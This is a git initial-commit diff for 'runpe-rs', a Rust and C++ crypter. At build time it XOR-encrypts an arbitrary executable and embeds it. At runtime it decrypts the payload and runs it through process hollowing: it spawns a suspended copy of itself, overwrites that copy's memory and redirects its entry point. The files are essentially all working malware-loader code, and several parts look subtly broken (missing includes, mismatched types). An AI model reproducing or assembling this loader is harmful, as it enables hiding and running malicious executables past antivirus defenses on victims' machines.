initial commit

This commit is contained in:
2025-07-22 00:02:14 +09:00
commit f38b576d3a
8 changed files with 192 additions and 0 deletions

3
.gitignore vendored Normal file
View File

@@ -0,0 +1,3 @@
/target
exe/s.exe
crypt.bin

25
Cargo.lock generated Normal file
View File

@@ -0,0 +1,25 @@
# This file is automatically @generated by Cargo.
# It is not intended for manual editing.
version = 4
[[package]]
name = "cc"
version = "1.2.30"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "deec109607ca693028562ed836a5f1c4b8bd77755c4e132fc5ce11b0b6211ae7"
dependencies = [
"shlex",
]
[[package]]
name = "runpe-rs"
version = "0.1.0"
dependencies = [
"cc",
]
[[package]]
name = "shlex"
version = "1.3.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "0fda2ff0d084019ba4d7c6f371c95d8fd75ce3524c3cb8fb653a3023f6323e64"

9
Cargo.toml Normal file
View File

@@ -0,0 +1,9 @@
[package]
name = "runpe-rs"
version = "0.1.0"
edition = "2024"
[dependencies]
[build-dependencies]
cc = "1.2.30"

24
build.rs Normal file
View File

@@ -0,0 +1,24 @@
use std::{fs, path::Path};
fn main() {
cc::Build::new()
.cpp(true)
.file("cpp/run_pe.cpp")
.compile("peffi");
let in_path = Path::new("exe/s.exe");
let key = 0x42;
let mut bytes = fs::read(in_path).expect("failed to read input");
xor_crypt(bytes.as_mut_slice(), key);
let out_path = Path::new("crypt.bin");
fs::write(out_path, bytes).expect("failed to write");
}
fn xor_crypt(input: &mut [u8], key: u8) {
for byte in input.iter_mut() {
*byte ^= key;
}
}

93
cpp/run_pe.cpp Normal file
View File

@@ -0,0 +1,93 @@
#include <iostream> // Standard C++ library for console I/O
#include <string> // Standard C++ Library for string manip
#include <Windows.h> // WinAPI Header
#include <TlHelp32.h> //WinAPI Process API
// use this if you want to read the executable from disk
HANDLE MapFileToMemory(LPCSTR filename)
{
std::streampos size;
std::fstream file(filename, std::ios::in | std::ios::binary | std::ios::ate);
if (file.is_open())
{
size = file.tellg();
char* Memblock = new char[size]();
file.seekg(0, std::ios::beg);
file.read(Memblock, size);
file.close();
return Memblock;
}
return 0;
}
extern "C" int RunPortableExecutable(void* Image)
{
IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols
IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols
IMAGE_SECTION_HEADER* SectionHeader;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
CONTEXT* CTX;
DWORD* ImageBase; //Base address of the image
void* pImageBase; // Pointer to the image base
int count;
char CurrentFilePath[1024];
DOSHeader = PIMAGE_DOS_HEADER(Image); // Initialize Variable
NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew); // Initialize
GetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.
{
ZeroMemory(&PI, sizeof(PI)); // Null the memory
ZeroMemory(&SI, sizeof(SI)); // Null the memory
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,
CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) // Create a new instance of current
//process in suspended state, for the new image.
{
// Allocate memory for the context.
CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
CTX->ContextFlags = CONTEXT_FULL; // Context is allocated
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
{
// Read instructions
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
// Write the image to the process
WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
{
SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));
WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),
LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
}
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8),
LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
// Move address of entry point to the eax register
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX)); // Set the context
ResumeThread(PI.hThread); //´Start the process/call main()
return 0; // Operation was successful.
}
}
}
}

1
cpp/run_pe.h Normal file
View File

@@ -0,0 +1 @@
extern "C" int RunPortableExecutable(void* Image);

18
src/main.rs Normal file
View File

@@ -0,0 +1,18 @@
use crate::runpe::run_portable_executable;
mod runpe;
fn xor_crypt(input: &mut [u8], key: u8) {
for byte in input.iter_mut() {
*byte ^= key;
}
}
static BYTES: &[u8] = include_bytes!("crypt.bin");
fn main() {
let mut bytes = BYTES.clone();
xor_crypt(&mut bytes, 0x42);
run_portable_executable(bytes).unwrap();
}

19
src/runpe.rs Normal file
View File

@@ -0,0 +1,19 @@
extern "C" {
fn RunPortableExecutable(Image: *mut std::ffi::c_void) -> i32;
}
pub fn run_portable_executable(image: &[u8]) -> Result<i32, &'static str> {
if image.is_empty() {
return Err("Empty byte slice passed");
}
let ptr = image.as_ptr() as *mut c_void;
let result = unsafe { RunPortableExecutable(ptr) };
if result < 0 {
Err("RunPortableExecutable failed")
} else {
Ok(result)
}
}